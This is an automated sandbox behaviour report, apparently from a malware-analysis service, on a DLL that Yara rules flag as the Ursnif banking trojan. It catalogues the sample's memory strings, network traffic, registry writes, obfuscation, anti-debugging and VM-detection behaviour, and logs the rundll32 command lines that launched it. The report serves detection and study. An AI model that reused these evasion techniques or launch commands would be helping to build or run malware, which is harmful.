Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/3
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/BbRR
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/V
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/e
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/favicon.icoW
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/mdll
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp String found in binary or memory: https://www.redtube.com/zO%F
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F1996 GetProcAddress,NtCreateSection,memset, 0_2_6E1F1996
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F1A44 NtMapViewOfSection, 0_2_6E1F1A44
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F23A5 NtQueryVirtualMemory, 0_2_6E1F23A5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BA5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02BA5A27
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BAB1A5 NtQueryVirtualMemory, 0_2_02BAB1A5
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F2184 0_2_6E1F2184
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BA888E 0_2_02BA888E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BA3EE1 0_2_02BA3EE1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BAAF80 0_2_02BAAF80
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2117B0 0_2_6E2117B0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E224E00 0_2_6E224E00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E22BE61 0_2_6E22BE61
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E220DB8 0_2_6E220DB8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2205E5 0_2_6E2205E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2288B7 0_2_6E2288B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2309C8 0_2_6E2309C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2117B0 4_2_6E2117B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E224E00 4_2_6E224E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E22BE61 4_2_6E22BE61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E220DB8 4_2_6E220DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2205E5 4_2_6E2205E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2288B7 4_2_6E2288B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2309C8 4_2_6E2309C8
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E223290 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E223290 appears 39 times
Uses 32bit PE files
Source: 60e40fb428612.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal68.troj.winDLL@17/14@17/3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BAA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_02BAA65C
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF1C465EC4A4AE6446.TMP
Source: 60e40fb428612.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Clockcondition
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Clockcondition
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Dogwhen
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Sing
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Wholegray
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Clockcondition
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Dogwhen
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Sing
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\60e40fb428612.dll,Wholegray
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 60e40fb428612.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 60e40fb428612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.476685729.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477751077.000000006E234000.00000002.00020000.sdmp, 60e40fb428612.dll
Source: 60e40fb428612.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 60e40fb428612.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 60e40fb428612.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 60e40fb428612.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 60e40fb428612.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress, 0_2_6E1F1BAC
PE file contains an invalid checksum
Source: 60e40fb428612.dll Static PE information: real checksum: 0x6292a should be: 0x6af68
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F2120 push ecx; ret 0_2_6E1F2129
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F2173 push ecx; ret 0_2_6E1F2183
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BAABC0 push ecx; ret 0_2_02BAABC9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BAAF6F push ecx; ret 0_2_02BAAF7F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E21DE07 push ecx; ret 0_2_6E21DE1A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E203276 push ebx; ret 0_2_6E20328A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E203244 pushad ; ret 0_2_6E203270
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2232D5 push ecx; ret 0_2_6E2232E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E202AD8 push edx; retf 0_2_6E202AD9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E20103D push cs; ret 0_2_6E20103E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2050D4 push cs; ret 0_2_6E2050DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E21DE07 push ecx; ret 4_2_6E21DE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E205DD6 push FFFFFFB7h; iretd 4_2_6E205DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E203276 push ebx; ret 4_2_6E20328A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E203244 pushad ; ret 4_2_6E203270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2232D5 push ecx; ret 4_2_6E2232E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E202AD8 push edx; retf 4_2_6E202AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E20103D push cs; ret 4_2_6E20103E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2050D4 push cs; ret 4_2_6E2050DD

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: iexplore.exe, 0000001E.00000002.465171579.000001D552E17000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Wp
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F2
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: iexplore.exe, 0000001E.00000002.464773273.000001D552D7F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: iexplore.exe, 0000001E.00000002.480400912.000001D556BD0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, 0_2_6E22AFAC
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, 0_2_6E22AFAC
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress, 0_2_6E1F1BAC
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E24E2D8 mov eax, dword ptr fs:[00000030h] 0_2_6E24E2D8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E24E207 mov eax, dword ptr fs:[00000030h] 0_2_6E24E207
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E24DE0E push dword ptr fs:[00000030h] 0_2_6E24DE0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E24E2D8 mov eax, dword ptr fs:[00000030h] 4_2_6E24E2D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E24E207 mov eax, dword ptr fs:[00000030h] 4_2_6E24E207
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E24DE0E push dword ptr fs:[00000030h] 4_2_6E24DE0E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E223484 GetProcessHeap, 0_2_6E223484
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E21FEBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E21FEBA

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\60e40fb428612.dll',#1
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.466411899.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.474065564.0000000003340000.00000002.00000001.sdmp, iexplore.exe, 0000001E.00000002.474775486.000001D5532B0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BA9135 cpuid 0_2_02BA9135
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 0_2_6E22EC14
Source: C:\Windows\System32\loaddll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 0_2_6E222C5A
Source: C:\Windows\System32\loaddll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_6E22D10F
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6E22EE88
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6E22EEC8
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6E22EF45
Source: C:\Windows\System32\loaddll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 0_2_6E22EFC8
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW, 0_2_6E222A26
Source: C:\Windows\System32\loaddll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_6E22F2E7
Source: C:\Windows\System32\loaddll32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 0_2_6E22CB0D
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_6E22AB64
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 0_2_6E22F394
Source: C:\Windows\System32\loaddll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_6E21E036
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6E2229A0
Source: C:\Windows\System32\loaddll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 0_2_6E22F1BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 4_2_6E22EC14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 4_2_6E222C5A
